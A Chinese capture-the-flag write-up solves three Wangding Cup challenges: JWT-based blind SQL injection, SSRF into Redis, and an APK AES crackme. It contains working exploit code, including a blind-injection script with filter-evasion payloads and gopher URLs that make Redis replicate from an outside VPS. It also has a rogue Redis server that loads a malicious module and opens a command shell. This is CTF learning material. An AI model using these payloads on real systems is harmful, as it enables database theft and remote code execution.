網鼎杯玄武組部分web題解

查看JS，在JS中找到p14.php，直接copy下來console執行，輸入戰隊的token就可以了

 

 

 

js_on

 

順手輸入一個 admin admin，看到下面的信息

 

歡迎admin
這里是你的信息：key:xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6

 

第一步想的是二次注入，但是一直被嘲諷，出題人素質有待加強，然后重新捋一遍思路，是不是命令注入，稍微測試了一下，感覺不對路，重新回過頭，提示的這個key很明顯是 jwt 的key，然后猜測二次注入的部分是不是在token部分，結果二次注入沒發現，倒是發現在 token處存在布爾注入，如果為真 news會返回你輸入的內容，如果為假，則返回 ？？？no message

 

腳本

 

 

# coding=utf-8

import jwt
import requests
import re
requests.packages.urllib3.disable_warnings()
key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
url = "http://84f801d8da46417d9747f9bb2f8187b963c126676ca644fd.cloudgame1.ichunqiu.com/index.php"
proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
# info = jwt.decode("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuZXdzIjoia2V5OnhSdCpZTURxeUNDeFl4aTlhQExnY0dwbm1NMlg4aSY2In0.EpNdctJ5Knu4ZkRcatsyMOxas1QgomB0Z49qb7_eoVg",key,algorithms=['HS256'])
# if info:
    # print(info)

# payloadTmpl = "i'/**/or/**/ascii(mid(database(),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(sc<a>hema_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.S<a>CHEMATA),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(ta<a>ble_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.t<a>ables/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(col<a>umn_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.c<a>olumns/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
payloadTmpl = "i'/**/or/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"

def half_interval():
    result = ""
    for i in range(1,45):
        min = 32
        max = 127
        while abs(max-min) > 1:
            mid = (min + max)//2 
            payload = payloadTmpl.format(i,mid)
            jwttoken = {
                "user": payload,
                "news": "success"
            }
            payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
            # print(payload)
            cookies = dict(token=str(payload))
            res = requests.get(url,cookies=cookies,proxies=proxies)
            if re.findall("success", res.text) != []:
                min = mid
            else:
                max = mid
        result += chr(max)
        print(result)

if __name__ == "__main__":
    half_interval()
    # payload = payloadTmpl.format(1,32)
    # jwttoken = {
    #     "user": payload,
    #     "news": "success"
    # }
    # print(jwttoken)
    # payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
    # print(payload)
    # cookies = dict(token=str(payload))
    # res = requests.get(url,cookies=cookies,proxies=proxies)
    # res.encoding='utf-8'
    # print(res.text)

2.png

 

 

ssrfme

 

剛拿到題目，想起來跟 SECCON 的題目很像，直接DNS重綁定繞過第一步

 

獲取到hint的源碼，提示ssrf 打 redis，直接寫contrab在save的時候提示沒權限，寫shell不知道路徑

 

一直主從復制也沒成功

 

很坑，沒權限

 

后來檢查一下發現目錄不對，轉移到有權限的/tmp 下面

 

gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit

 

然后重復主從的步驟，在自己的VPS上起好了 rogue 服務器

 

gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252039.107.68.253%252060001%250d%250aquit

 

服務器監聽

 

import socket
import time

CRLF="\r\n"
payload=open("exp.so","rb").read()
exp_filename="exp.so"

def redis_format(arr):
    global CRLF
    global payload
    redis_arr=arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len(x))+CRLF+x
    cmd+=CRLF
    return cmd

def redis_connect(rhost,rport):
    sock=socket.socket()
    sock.connect((rhost,rport))
    return sock

def send(sock,cmd):
    sock.send(redis_format(cmd))
    print(sock.recv(1024).decode("utf-8"))

def interact_shell(sock):
    flag=True
    try:
        while flag:
            shell=raw_input("\033[1;32;40m[*]\033[0m ")
            shell=shell.replace(" ","${IFS}")
            if shell=="exit" or shell=="quit":
                flag=False
            else:
                send(sock,"system.exec {}".format(shell))
    except KeyboardInterrupt:
        return


def RogueServer(lport):
    global CRLF
    global payload
    flag=True
    result=""
    sock=socket.socket()
    sock.bind(("0.0.0.0",lport))
    sock.listen(10)
    clientSock, address = sock.accept()
    while flag:
        data = clientSock.recv(1024)
        if "PING" in data:
            result="+PONG"+CRLF
            clientSock.send(result)
            flag=True
        elif "REPLCONF" in data:
            result="+OK"+CRLF
            clientSock.send(result)
            flag=True
        elif "PSYNC" in data or "SYNC" in data:
            result = "+FULLRESYNC " + "a" * 40 + " 1" + CRLF
            result += "$" + str(len(payload)) + CRLF
            result = result.encode()
            result += payload
            result += CRLF
            clientSock.send(result)
            flag=False

if __name__=="__main__":
    lhost="xxx.xxx.xxx.xxx"
    lport=60001

 

 

java

 

用 jadx 對 java.apk 反匯編

 

主程序邏輯並不復雜，正常的輸入，以及將輸入進行計算后比對

 

先對用戶輸入進行 AES 加密 ，Key 為 aes_check_key!@#，然后進行兩次異或，最后 base64 編碼

 

與 VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3進行比較

 

所以 crack 過程也很簡單，逆回來就得到輸入，但是中間卡在密鑰並不是直接給的密鑰，還對密鑰里 'e' 和 'o'進行了替換，最終密鑰為 aos_chock_koy!@#，逆回去得到flag